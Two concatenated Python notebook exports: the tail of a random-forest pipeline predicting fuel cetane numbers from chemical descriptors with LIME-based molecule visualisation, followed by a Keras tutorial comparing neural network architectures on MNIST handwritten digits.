# Create machine learning model using a Random Forest Classifier
predictors = []
names = []
compounds = []
training_compounds = OrderedDict(sorted(training_data.compound.items(), key=lambda t: t[0]))
# Preprocess data
for identifier, compound in dict.iteritems(training_compounds):
predictors.append(training_compounds[identifier]['predictor'])
compounds.append(training_compounds[identifier])
names.append(identifier)
predictor_values = np.array(predictors, '|S4').astype(np.float)
#Generate predictor values: y
predict = np.zeros(len(predictor_values), dtype=int)
for i, value in np.ndenumerate(predictor_values):
if value >= np.median(predictor_values):
predict[i] = 1
rows = len(predict)
# Load the names of the features
feature_names = []
for compound in compounds:
feature_names = sorted(compound['padelhash'].keys())
for c in feature_names:
if c == 'Name':
feature_names.remove(c)
columns = len(feature_names)
data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(data_table):
compound = compounds[index[0]]['padelhash']
feature = list(feature_names)[index[1]]
data_table[index] = float(compound[feature])
self.data_table = data_table
self.feature_names = feature_names
self.compounds = compounds
self.predict = predict
self.predictor_values = predictor_values
self.training_data = training_data
self.training_compounds = training_compounds
self.names = names
def reduce_features(self):
feature_list = np.genfromtxt("feature_list.txt", dtype="str", delimiter="\t", comments="%")
feature_ids = [a for a, b in feature_list]
feature_patterns = [b for a, b in feature_list]
data_table = self.data_table
names = self.names
# Remove invariable features
reduced_X = data_table[:,np.where(data_table.var(axis=0)!=0)[0]]
reduced_feature_ids = [feature_ids[i] for i in np.where(data_table.var(axis=0)!=0)[0]]
reduced_feature_patterns = [feature_patterns[i] for i in np.where(data_table.var(axis=0)!=0)[0]]
rows = len(names)
columns = len(reduced_feature_ids)
reduced_data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(reduced_data_table):
compound = self.compounds[index[0]]['padelhash']
feature = list(reduced_feature_ids)[index[1]]
reduced_data_table[index] = float(compound[feature])
self.reduced_data_table = reduced_data_table
self.reduced_feature_ids = reduced_feature_ids
self.reduced_feature_patterns = reduced_feature_patterns
def learn(self):
self.clf = sklearn.ensemble.RandomForestClassifier(n_estimators=512, oob_score=True, n_jobs=-1, class_weight="balanced")
self.clf.fit(X=self.reduced_data_table, y=self.predict)
# ## Evaluate classifier
# +
class CrossValidate:
def __init__(self, model):
self.model = model
self.clf = sklearn.ensemble.RandomForestClassifier(n_estimators=512, oob_score=True, n_jobs=-1, class_weight="balanced")
def cross_validation(self):
self.clf.fit(X=self.model.reduced_data_table, y=self.model.predict)
def _run_cv(cv, clf, y, X):
ys = []
for train_idx, valid_idx in cv:
clf.fit(X=X[train_idx], y=y[train_idx])
cur_pred = clf.predict(X[valid_idx])
ys.append((y[valid_idx], cur_pred))
acc = np.fromiter(map(lambda tp: sklearn.metrics.accuracy_score(tp[0], tp[1]), ys), np.float)
prec = np.fromiter(map(lambda tp: sklearn.metrics.precision_score(tp[0], tp[1]), ys), np.float)
recall = np.fromiter(map(lambda tp: sklearn.metrics.recall_score(tp[0], tp[1]), ys), np.float)
roc = np.fromiter(map(lambda tp: sklearn.metrics.roc_auc_score(tp[0], tp[1]), ys), np.float)
print_line = ("\tAccuracy: %0.4f +/- %0.4f" % (np.mean(acc), np.std(acc) * 2))
print(print_line)
print_line = ("\tPrecision: %0.4f +/- %0.4f" % (np.mean(prec), np.std(prec) * 2))
print(print_line)
print_line = ("\tRecall: %0.4f +/- %0.4f" % (np.mean(recall), np.std(recall) * 2))
print(print_line)
print_line = ("\tReceiver Operator, AUC: %0.4f +/- %0.4f" % (np.mean(roc), np.std(roc) * 2))
print(print_line)
# 50% hold-out very conservative uses half the data for training and half the data for testing
# Likely closer accuracy match to novel dataset
cv = sklearn.cross_validation.StratifiedShuffleSplit(self.model.predict, n_iter=100, test_size=0.5)
print("For 100 resamples at 50%")
_run_cv(cv, self.clf, self.model.predict, self.model.reduced_data_table)
# 10-fold cross-validation, less conservative uses 90% of the data for training and 10% of the data for testing
# Likely closer accuracy between model and training data
cv = sklearn.cross_validation.StratifiedKFold(self.model.predict, n_folds=10)
print("For 10-fold cross validation")
_run_cv(cv, self.clf, self.model.predict, self.model.reduced_data_table)
def visualize(self, filename):
plt.clf()
sns.set_style("darkgrid")
# Initialize the figure
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([-0.01, 1.01])
plt.ylim([-0.01, 1.01])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Mean Receiver operating characteristic')
tprs = []
base_fpr = np.linspace(0, 1, 101)
# Run 10 instances of 10X cross_validation
for i in range(10):
X_train, X_test, y_train, y_test = sklearn.cross_validation.train_test_split(self.model.reduced_data_table, self.model.predict, test_size=0.1)
self.clf.fit(X_train, y_train)
y_pred = self.clf.predict_proba(X_test)[:, 1]
fpr, tpr, _ = sklearn.metrics.roc_curve(y_test, y_pred)
plt.plot(fpr, tpr, 'b', alpha=0.15)
tpr = np.interp(base_fpr, fpr, tpr)
tpr[0] = 0.0
tprs.append(tpr)
# Get average and std for cross_validation
tprs = np.array(tprs)
mean_tprs = tprs.mean(axis=0)
std = tprs.std(axis=0)
tprs_upper = np.minimum(mean_tprs + std, 1)
tprs_lower = mean_tprs - std
#Plot multiple ROCs
plt.plot(base_fpr, mean_tprs, 'b')
plt.fill_between(base_fpr, tprs_lower, tprs_upper, color='grey', alpha=0.3)
plt.axes().set_aspect('equal')
plt.savefig(filename)
Image(filename = filename)
# -
# ## Load testing data
class Testing:
def __init__(self):
pass
def load(self, filename):
testing_data = pcp.Collect(local=filename, sdf=True)
testing_data = cf.Update(testing_data, remove_static=False)
testing_data.update(padel=True)
testing_compounds = OrderedDict(sorted(testing_data.compound.items(), key=lambda t: t[0]))
compounds = []
for identifier, compound in dict.iteritems(testing_compounds):
compounds.append(testing_compounds[identifier])
#self.filename = filename
#testing = rtest.Read(filename, id_name="PubChem")
#testing_data = pcp.Collect(testing.compounds, sdf=True, chunks=20, id_name='PubChem', proxy=None)
#pubchem_id_dict = {}
#for compound in testing.compounds:
# pubchem_id_dict[compound['PubChem']] = compound['Name']
# testing_data = cf.Update(testing_data, remove_static=False)
# Run PaDEL-Descriptor to extract 6150 substructural features
#testing_data.update(padel=True)
feature_names = []
#testing_compounds = OrderedDict(sorted(testing_data.compound.items(), key=lambda t: t[0]))
#compounds = []
#for identifier, compound in dict.iteritems(testing_compounds):
# compounds.append(testing_compounds[identifier])
# Load the names of the features
feature_names = []
for compound in compounds:
feature_names = sorted(compound['padelhash'].keys())
for c in feature_names:
if c == 'Name':
feature_names.remove(c)
columns = len(feature_names)
rows = len(testing_data.compound)
test = np.zeros((rows, columns,), dtype=np.float64)
compounds = []
testing_names = []
testing_data.compound = OrderedDict(sorted(testing_data.compound.items(), key=lambda t: t[0]))
for id, compound in testing_data.compound.iteritems():
compounds.append(compound)
testing_names.append(id)
self.testing_data = testing_data
self.compounds = compounds
self.testing_names = testing_names
#self.pubchem_id_dict = pubchem_id_dict
rows = len(testing_names)
# Load the names of the features
feature_names = []
for compound in compounds:
feature_names = sorted(compound['padelhash'].keys())
for c in feature_names:
if c == 'Name':
feature_names.remove(c)
columns = len(feature_names)
testing_data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(testing_data_table):
compound = compounds[index[0]]['padelhash']
feature = list(feature_names)[index[1]]
testing_data_table[index] = float(compound[feature])
self.feature_names = feature_names
self.testing_data_table = testing_data_table
def reduce_features(self, train):
feature_list = np.genfromtxt("feature_list.txt", dtype="str", delimiter="\t", comments="%")
feature_ids = [a for a, b in feature_list]
feature_patterns = [b for a, b in feature_list]
data_table = self.testing_data_table
names = self.testing_names
# Remove invariable features
reduced_feature_ids = train.reduced_feature_ids
reduced_feature_patterns = train.reduced_feature_patterns
rows = len(names)
columns = len(reduced_feature_ids)
reduced_data_table = np.zeros((rows, columns), dtype=np.float64)
# Load the training values: X
for index, value in np.ndenumerate(reduced_data_table):
compound = self.compounds[index[0]]['padelhash']
feature = list(reduced_feature_ids)[index[1]]
reduced_data_table[index] = float(compound[feature])
self.reduced_data_table = reduced_data_table
self.reduced_feature_ids = reduced_feature_ids
self.reduced_feature_patterns = reduced_feature_patterns
def learn(self, train):
train.clf.fit(X=train.data_table, y=train.predict)
print(train.clf.predict_proba(self.testing_data_table))
print(self.testing_names)
# ## Evaluate the similarity of training and testing datasets
class VisualizeTesting():
def __init__(self, train, testing):
self.train = train
self.testing = testing
def pca(self):
self.pca = PCA()
self.pca.fit(self.train.data_table)
self.pc_train = self.pca.transform(self.train.data_table)
self.pc_testing = self.pca.transform(self.testing.testing_data_table)
def viz_explained(self, filename):
plt.clf()
summed_variance = np.cumsum(self.pca.explained_variance_ratio_)
plt.axhline(summed_variance[4], color="mediumpurple")
barlist = plt.bar(range(25), summed_variance[:25], color="steelblue")
thresh = np.where(summed_variance[:25] <= summed_variance[4])[0]
for t in thresh:
barlist[t].set_color('mediumpurple')
plt.axhline(0.9, color="darkred")
thresh = np.where(summed_variance[:25] >= 0.9)[0]
for t in thresh:
barlist[t].set_color('darkred')
plt.title("Variance Explained by Each PC")
plt.savefig(filename)
Image(filename = filename)
def viz_xx(self, filename):
plt.clf()
pc = self.pc_train
pc_test = self.pc_testing
f, axarr = plt.subplots(4, 4, sharex='col', sharey='row')
axarr[0, 0].set_title("PC1")
axarr[0, 1].set_title("PC2")
axarr[0, 2].set_title("PC3")
axarr[0, 3].set_title("PC4")
axarr[0, 0].set_ylabel("PC2")
axarr[1, 0].set_ylabel("PC3")
axarr[2, 0].set_ylabel("PC4")
axarr[3, 0].set_ylabel("PC5")
axarr[0, 0].scatter(pc[:, 1], pc[:, 0])
axarr[0, 0].scatter(pc_test[:, 1], pc_test[:, 0], color="red")
axarr[1, 0].scatter(pc[:, 2], pc[:, 0])
axarr[1, 0].scatter(pc_test[:, 2], pc_test[:, 0], color="red")
axarr[2, 0].scatter(pc[:, 3], pc[:, 0])
axarr[2, 0].scatter(pc_test[:, 3], pc_test[:, 0], color="red")
axarr[3, 0].scatter(pc[:, 4], pc[:, 0])
axarr[3, 0].scatter(pc_test[:, 4], pc_test[:, 0], color="red")
axarr[0, 1].axis('off')
axarr[1, 1].scatter(pc[:, 2], pc[:, 1])
axarr[1, 1].scatter(pc_test[:, 2], pc_test[:, 1], color="red")
axarr[2, 1].scatter(pc[:, 3], pc[:, 1])
axarr[2, 1].scatter(pc_test[:, 3], pc_test[:, 1], color="red")
axarr[3, 1].scatter(pc[:, 4], pc[:, 1])
axarr[3, 1].scatter(pc_test[:, 4], pc_test[:, 1], color="red")
axarr[0, 2].axis('off')
axarr[1, 2].axis('off')
axarr[2, 2].scatter(pc[:, 3], pc[:, 2])
axarr[2, 2].scatter(pc_test[:, 3], pc_test[:, 2], color="red")
axarr[3, 2].scatter(pc[:, 4], pc[:, 2])
axarr[3, 2].scatter(pc_test[:, 4], pc_test[:, 2], color="red")
axarr[0, 3].axis('off')
axarr[1, 3].axis('off')
axarr[2, 3].axis('off')
axarr[3, 3].scatter(pc[:, 4], pc[:, 3])
axarr[3, 3].scatter(pc_test[:, 4], pc_test[:, 3], color="red")
plt.savefig(filename)
Image(filename = filename)
# ## Lime
class LIME:
def __init__(self, training, testing, identifier):
self.training = training
self.testing = testing
self.identifier = identifier
training.clf.fit(training.reduced_data_table, training.predict)
self.predict_fn = lambda x: training.clf.predict_proba(x).astype(float)
categorical_features = range(len(training.reduced_feature_patterns))
categorical_names = {}
for feature in categorical_features:
le = sklearn.preprocessing.LabelEncoder()
le.fit(training.reduced_data_table[:, feature])
categorical_names[feature] = le.classes_
explainer = lime.lime_tabular.LimeTabularExplainer(testing.reduced_data_table, verbose=True,
feature_names=training.reduced_feature_patterns,
class_names = [str('Low'+ identifier), str('High' + identifier)],
categorical_features=categorical_features,
categorical_names=categorical_names, kernel_width = 3)
self.explainer = explainer
def molecule(self, local=False):
import imp
indigo = imp.load_source('indigo', 'indigo-python-1.2.3.r0-mac/indigo.py')
indigo_renderer = imp.load_source('inigo_renderer', 'indigo-python-1.2.3.r0-mac/indigo_renderer.py')
indigo = indigo.Indigo()
indigoRenderer = indigo_renderer.IndigoRenderer(indigo)
def getAtomsActivity (m, patterns):
matcher = indigo.substructureMatcher(m)
atom_values = defaultdict(float)
for pattern, value in patterns:
try:
query = indigo.loadQueryMolecule(pattern)
for match in matcher.iterateMatches(query):
for qatom in query.iterateAtoms():
atom = match.mapAtom(qatom)
atom_values[atom.index()] += value / query.countAtoms()
except:
pass
return atom_values
def addColorSGroups (m, atom_values):
min_value = min(atom_values.itervalues())
max_value = max(atom_values.itervalues())
centered_value = (min_value + max_value) / 2.
for atom_index, atom_value in atom_values.iteritems():
if atom_value < 0.:
color = "0, 0, %f" % abs(atom_value / centered_value)
elif atom_value > 0.:
color = "%f, 0, 0" % abs(atom_value / centered_value)
m.addDataSGroup([atom_index], [], "color", color)
return min_value, max_value
def assignColorGroups (m, patterns):
atom_values = getAtomsActivity(m, patterns)
min_value, max_value = addColorSGroups(m, atom_values)
return min_value, max_value
for count, (id, compound) in enumerate(self.testing.testing_data.compound.iteritems()):
id_name = id
print(count, id_name)
_base = 'pubchem.ncbi.nlm.nih.gov'
uri = '/rest/pug/compound/cid/' + str(id_name) + '/record/SDF'
uri = 'http://' + _base + uri
if not local:
response = urllib2.urlopen(uri)
value = response.read().strip().decode().strip('$$$$')
filename = "data/" + str(id_name) + ".sdf"
text_file = open(filename, "w")
text_file.write(value)
text_file.close()
row = count
#Collect explanations from LIME
exp = self.explainer.explain_instance(self.testing.reduced_data_table[row],
self.predict_fn,
num_features=len(self.training.reduced_feature_patterns),
top_labels=1, verbose=True, num_samples=5000)
#Load molecule
if local:
mol = indigo.iterateSDFile(local)
m = mol.at(count)
else:
mol = indigo.iterateSDFile(filename)
m = mol.at(0)
patterns = []
#Find the local explanation: exp.local_exp[1]
intercept = exp.intercept.keys()[0]
local_prob = exp.intercept.values()[0]
prob = exp.predict_proba[intercept]
for k, v in exp.local_exp.items():
for (num, val) in v:
print(str(id_name), exp.domain_mapper.exp_feature_names[num], val)
#Map the explanation to the feature, if it is present in the molecule move forward
if float(exp.domain_mapper.feature_values[num]) == 1.:
if abs(val) != 0.:
patterns.append((self.testing.reduced_feature_patterns[num], val))
#Draw molecules
indigo.setOption("render-atom-ids-visible", "false");
indigo.setOption("render-atom-color-property", "color")
indigo.setOption('render-coloring', False)
indigo.setOption('render-comment-font-size', 32)
indigo.setOption('render-bond-line-width', 2.0)
indigo.setOption("render-margins", 100, 1);
indigo.setOption('render-comment', id_name)
try:
assignColorGroups(m, patterns)
except:
pass
renderfile = "img/" + str(self.identifier) + str(id_name) + ".png"
indigoRenderer.renderToFile(m, renderfile)
def run_classifier(training_file, testing_file, roc_file, identifier, train=False, cv=True, visualize=True, lime=True, local=False, delim=""):
if not train:
train = Train()
train.load(training_file, identifier)
train.reduce_features()
train.learn()
if cv:
CV = CrossValidate(train)
CV.cross_validation()
if visualize:
CV.visualize(roc_file)
test = Testing()
test.load(testing_file)
test.reduce_features(train)
test.learn(train)
if visualize:
viz = VisualizeTesting(train, test)
viz.pca()
var_file = delim + "visualized_variance.png"
viz.viz_explained(var_file)
xx_file = delim + "visualized_xx.png"
viz.viz_xx(xx_file)
if lime:
lime = LIME(train, test, identifier)
lime.molecule(local)
return(train)
training = run_classifier('cetane.txt', "testing_data.txt", 'testing_data.png', 'Cetane', cv=False, train=False, visualize=True, lime=True, delim="testing")
|
BCML_FeatureCreature.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="ViGZ1Nf6qLZ9"
# # Classifying handwritten digits with deep networks
#
# Here we explore how changing the architecture of a neural network impacts the performance of the network.
#
# ## 1. Data preparation
# Before we can build any neural networks we need to import a few things from Keras and prepare our data. The following code extracts the MNIST dataset, provided by Keras, and flattens the 28x28 pixel images into a vector with length 784. Additionally, it modifies the labels from a numeric value 0-9 to categorical class labels.
# + colab={"base_uri": "https://localhost:8080/", "height": 69} id="LRYVKDbQqLaB" outputId="aa8fef47-2c40-49d1-f3c4-98205d823459"
import keras
from keras.datasets import mnist
from keras.layers import Dense
from keras.models import Sequential
from keras.layers import Layer
from matplotlib import pyplot as plt
from random import randint
# Preparing the dataset
# Setup train and test splits
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Making a copy before flattening for the next code-segment which displays images
x_train_drawing = x_train
image_size = 784 # 28 x 28
x_train = x_train.reshape(x_train.shape[0], image_size)
x_test = x_test.reshape(x_test.shape[0], image_size)
# Convert class vectors to binary class matrices
num_classes = 10
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# + [markdown] id="g6rqmYKZHInx"
# ## 2. A look at some random digits
#
# It's a good idea to get a sense of the dataset we're working with. Run this code multple times to see new randomly selected digits from the training set.
# + colab={"base_uri": "https://localhost:8080/", "height": 350} id="XaR6ncOmHNNw" outputId="df3cde0e-6b20-4be7-a639-91f86c4b47c3"
for i in range(64):
ax = plt.subplot(8, 8, i+1)
ax.axis('off')
plt.imshow(x_train_drawing[randint(0, x_train.shape[0])], cmap='Greys')
# -
# ## 3. Visualizing weights in a single-layer network
model = Sequential()
out_layer = Dense(units=num_classes, activation='softmax', input_shape=(image_size,))
model.add(out_layer)
model.summary()
model.compile(optimizer="sgd", loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, epochs=50, verbose=False, validation_data=(x_test, y_test))
history.history.keys()
loss, accuracy = model.evaluate(x_train, y_train, verbose=False)
print(f'Train loss: {loss:.3}')
print(f'Train accuracy: {accuracy:.3}')
loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
# +
import numpy as np
output_weights = out_layer.get_weights()
arr = np.array(output_weights[0])
w = np.transpose(arr)
weights_per_label_long = w.tolist()
w.shape
# -
model.compile(optimizer="sgd", loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, batch_size=128, epochs=4, verbose=False, validation_data=(x_test, y_test))
# +
loss, accuracy = model.evaluate(x_train, y_train, verbose=False)
print(f'Train loss: {loss:.3}')
print(f'Train accuracy: {accuracy:.3}')
loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
# -
# We do not exactly know what the network learns about each digit - the pixels of the same digit could be very different. But for a single-layer network we can visualize weights to see what the network leaned after 5 epochs.
# Each output node has a weight coming from every pixel.
# For example, the output "2?" node has 784
# input weights, each mapping the
# relationship between a pixel and the
# number "2". If the weight is high,
# it means that the model believes
# there's a high degree of correlation
# between that pixel and the number 2. If the number is very low (negative),
# then the network believes there is a very low correlation
# (perhaps even negative correlation)
# between that pixel and the number 2.
# Thus, if we take our the matrix of weights for each pixel
# and print it, we can "see" what network learned for a particular output node.
from matplotlib import cm
output_weights = out_layer.get_weights()
arr = np.array(output_weights[0])
w = np.transpose(arr)
weights_per_label = w.tolist()
cmp = cm.get_cmap("Dark2_r", 10)
for i in range(len(weights_per_label)):
a = np.array(weights_per_label[i])
pixels = np.reshape(a, (28, 28))
ax = plt.subplot(2, 5, i+1)
ax.axis('off')
plt.imshow(pixels, interpolation='bilinear',cmap=cmp)
plt.colorbar()
for i in range(len(weights_per_label_long)):
a = np.array(weights_per_label_long[i])
pixels = np.reshape(a, (28, 28))
ax = plt.subplot(2, 5, i+1)
ax.axis('off')
plt.imshow(pixels, interpolation='bilinear', cmap=cmp)
# + [markdown] id="UkCoJlsjqLaM"
# ## 4. Adding one hidden layer
#
# Here is a first, simple network, to solve MNIST. It has a single hidden layer with 32 nodes.
# +
model = Sequential()
# The input layer requires the special input_shape parameter which should match
# the shape of our training data.
model.add(Dense(units=32, activation='sigmoid', input_shape=(image_size,)))
model.add(Dense(units=num_classes, activation='softmax'))
model.summary()
# -
model.compile(optimizer="sgd", loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, batch_size=128, epochs=10, verbose=False, validation_data=(x_test, y_test))
# history.history
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss function')
plt.ylabel('loss (error)')
plt.xlabel('epoch')
plt.legend(['training', 'validation'], loc='best')
plt.show()
loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
# + [markdown] id="ARsdbx5hqLah"
# ## 5. Preparing to run experiments
#
# There are a couple of things we're going to do repeatedly in this notebook:
#
# * Build a model, and
# * Evaluate that model.
#
# These two functions will save us a bit of boilerplate overall. These functions will also help us compare "apples to apples" -- since we can be sure when we call `create_dense` and `evaluate` our models and training regimen will use the same hyperparameters. Both use some of the variables declared above, and both therefore are explicitly intended for working with the MNIST dataset.
#
# `create_dense` accepts an array of layer sizes, and returns a Keras model of a fully connected neural network with the layer sizes specified. `create_dense([32, 64, 128])` will return a deeply connected neural net with three hidden layers, the first with 32 nodes, second with 64 nodes, and third with 128 nodes.
#
# `create_dense` uses the `image_size` variable declared above, which means it assumes the input data will be a vector with 784 units. All the hidden layers use the sigmoid activation function except the output layer, which uses softmax.
#
# `evaluate` prints a summary of the model, trains the model, and then prints the loss and accuracy. This function by default runs 10 training epochs and uses a fixed batch-size of 128 inputs per batch. It also uses the MNIST data extracted from Keras that we processed above.
# + id="tP4mxCmLqLai"
def create_dense(layer_sizes):
model = Sequential()
model.add(Dense(layer_sizes[0], activation='sigmoid', input_shape=(image_size,)))
for s in layer_sizes[1:]:
model.add(Dense(units = s, activation = 'sigmoid'))
model.add(Dense(units=num_classes, activation='softmax'))
return model
def evaluate(model, batch_size=128, epochs=10, title="", plot=True):
print(title)
model.compile(optimizer='sgd', loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_split=.1, verbose=False)
loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
if plot:
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss function')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['training', 'validation'], loc='best')
plt.show()
print()
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
# + [markdown] id="BWAIlFjKqLam"
# ## 6. Comparing different architectures
# ### 6.1. Number of hidden layers
#
# The following code trains and evaluates models with different numbers of hidden layers. All the hidden layers have 32 nodes. The first model has 1 hidden layer, the second as 2 ... up to four layers.
#
# + colab={"base_uri": "https://localhost:8080/", "height": 2634} id="ySDBNtbHqLao" outputId="08cf946b-b944-4929-8540-cea11c990307"
for layers in range(1, 5):
model = create_dense([32] * layers)
evaluate(model, title="# of hidden layers = {}".format(layers), plot=False)
print("=============================")
print()
# + [markdown] id="lVhUrkcAsF95"
# ### 6.2. Deeper networks need more epochs
#
# One of the factors at play above is that deeper networks take more time to train. This has to do with backpropogation, gradient descent, and the way optimization algorithms work -- those details are beyoned the scope of this notebook, but consider what happens when we let the 3 layer network that had mediocre performance above train for longer.
# + colab={"base_uri": "https://localhost:8080/", "height": 689} id="JuhHqjWQsklA" outputId="c1bae770-09ea-4077-a897-128b9726b5c6"
model = create_dense([32, 32, 32])
evaluate(model, epochs=100, plot=False)
# + [markdown] id="4H6Bqkh1qLaw"
# ### 6.2. Number of nodes per layer
#
# Another way to add complexity is to add more nodes to each hidden layer. The following code creates several single layer neural networks, with increasingly more nodes in that layer.
# + colab={"base_uri": "https://localhost:8080/", "height": 4232} id="c9vC67yfqLaz" outputId="f5ed8075-739f-4dff-d4c7-9d45ef146f62"
for nodes in [32, 64, 128, 256, 512, 1024, 2048]:
model = create_dense([nodes])
evaluate(model, epochs=10, plot=False, title="# of nodes in the hidden layer = {}".format(nodes))
print("=============================")
print()
# + [markdown] id="T_esBBNpqLa7"
# ### 6.3. More layers and more nodes per layer
#
# Now that we've looked at the number of nodes and the number of layers in an isolated context, lets look at what happens as we combine these two factors.
# + colab={"base_uri": "https://localhost:8080/", "height": 3375} id="dkEcWw05qLa-" outputId="02c279d9-783e-4eb2-89c5-3c9de7d5c89f"
nodes_per_layer = 32
for layers in [1, 2, 3, 4, 5]:
model = create_dense([nodes_per_layer] * layers)
evaluate(model, epochs=10*layers, plot=False,
title="# of hidden layers = {} with {} nodes per layer and {} epochs".format(layers,nodes_per_layer, 10*layers))
print("=============================")
print()
# + colab={"base_uri": "https://localhost:8080/", "height": 3375} id="kYuxXcWCqLbH" outputId="2b505072-36c1-42ba-b24d-e48b4aba5f89"
nodes_per_layer = 128
for layers in [1, 2, 3, 4, 5]:
model = create_dense([nodes_per_layer] * layers)
evaluate(model, epochs=10*layers, plot=False,
title="# of hidden layers = {} with {} nodes per layer and {} epochs".format(layers,nodes_per_layer, 10*layers))
print("=============================")
print()
# + colab={"base_uri": "https://localhost:8080/", "height": 3375} id="s54vh7IbqLbO" outputId="3f0a6505-9ac8-4365-f869-f0ed2924d23a"
nodes_per_layer = 512
for layers in [1, 2, 3, 4, 5]:
model = create_dense([nodes_per_layer] * layers)
evaluate(model, epochs=10*layers, plot=False,
title="# of hidden layers = {} with {} nodes per layer and {} epochs".format(layers,nodes_per_layer, 10*layers))
print("=============================")
print()
# + [markdown] id="MJKZhbJws1zU"
# ## 7. Smaller batches
#
# Sometimes models with several layers need to not only train for longer, but also need more corrections per epoch. By decreasing the batch size, we can increase the number of overall corrections that a model gets. We also ensure it gets more fine grained information by adjusting to error over smaller batches.
#
# In this case, we can force a model that did not learn well in previous experiments to achieve a moderately respectable accuracy. The performance is still not great, but it's worth mentioning that with patience and computational power we can make a model that looked like total junk perform decently.
#
# Still our effort would probably be better spent on more promising models.
# + colab={"base_uri": "https://localhost:8080/", "height": 758} id="ICl_MQiJsOHa" outputId="151eeb9e-3706-4292-bdf4-843b75b434bc"
model = create_dense([128] * 5)
evaluate(model, batch_size=16, epochs=50, plot=False)
# + [markdown] id="NlyjS73u-J-D"
# ## 8. Best 3-layer network with smaller batches
# -
model = create_dense([2048] * 1)
evaluate(model, batch_size=16, epochs=10, plot=True)
|
handwriting_classification.ipynb
|